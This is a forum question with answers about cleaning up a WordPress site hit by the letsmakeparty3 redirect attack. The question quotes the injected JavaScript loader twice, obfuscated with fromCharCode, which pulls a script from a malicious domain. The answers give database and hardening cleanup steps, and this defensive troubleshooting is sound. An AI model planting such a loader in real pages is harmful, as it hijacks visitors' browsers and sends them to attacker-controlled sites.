# How to solve wordpress redirection hacks attacks?

Tags: wordpress, phishing

My website https://spicecarts.in just now got hacked! It is redirecting to other sites!
I checked with this tool https://sitecheck.sucuri.net/results/https/spicecarts.in
and found the errors
1.Known javascript malware: malware.injection?35.27

Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,97,108,108,111,119,46,108,101,116,115,109,97,107,101,112,97,114,116,121,51,46,103,97,47,108,46,106,115,63,100,61,49);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

Redirects to https://spicecarts.in/

2.This page includes a JavaScript/iframe from letsmakeparty3.ga that is blacklisted by Sucuri Labs, reason: injected script, see https://labs.sucuri.net/?blacklist=letsmakeparty3.ga

https://allow.letsmakeparty3.ga/request?Type=api&query=034/wp-content/plugins/super-progressive-web-apps/public/js/register-sw.js

3.In https://spicecarts.in/wp-includes/css/ malware found as below

Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,97,108,108,111,119,46,108,101,116,115,109,97,107,101,112,97,114,116,121,51,46,103,97,47,108,46,106,115,63,100,61,49);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

How to solve this!

Answer (score 5):

First, calm down. My website has suffered the same `SQL injection attack` and here's how I solved it. Make sure to `backup` your `database` first.

1. Go to your `phpmyadmin` and open `wp_options` table. Update the `option_value` of `siteurl` and `home` with the url of your website's url without `/` at the end, example `https://yourwebsite.com`. After updating, you are now able to login to your website.

[image]

2. Login to your website and delete the `transient` options you can use [wp-optimize](https://wordpress.org/plugins/wp-optimize/) plugin to delete the `transient` options like these:

[image]

3. In conclusion, what you need to do is to clean your `database`. There are plugins that can do such cleaning. You may also search your `database` for `letsmakeparty3` and remove these.

[image]

Comment: Thanks, @Romel. I fixed the issue by updating **siteUr**l and **home**. But again the next day exactly 12 AM the same thing happened. In my DB only **siteUrl** and **home** was affected. Could you please let me know any permanent solution?

Comment: You will need to change your `database` credentials change the `username` and `password` which are set in your `wp-config.php`. You will also need to change your `database` prefix which by default is `wp_` hackers assume your database tables to have `wp_` as prefixes, changing these will improve your security and avoid `SQL` injection easily. See `Wordpress` hardening guide. https://wordpress.org/support/article/hardening-wordpress/#security-through-obscurity

Change your `DB` prefix guide: https://help.one.com/hc/en-us/articles/360002107438-Change-the-table-prefix-for-WordPress-

Comment: I have written a step by step article for you. https://mel-7.com/fix-letsmakeparty3-attack-in-wordpress-websites

Answer (score 0):

You will also want to be sure that any potential malware on the site is cleaned.  You can either submit the site for cleaning to a professional service or try to do it yourself.  As mentioned above, you will need to clean the DB.  You will also need to check for infected files.  If you have a clean version of your theme and plugin files stored in a backup or on your local machine, that could be a good place to start.  Make sure everything on the site is updated (outdated plugins usually = vulnerability).  If it's redirecting to letsmakeparty3, then it's worth checking to see if the MU plugin rms_unique_wp_mu_pl_fl_nm was added to your site.  Cheers!

Answer (score 0):

Hi y found and delete virus in the database.

Juste chearch the caractère base 64 encoded in the database in the table option.

decode any information base 64 and delete this.

[image]

[image]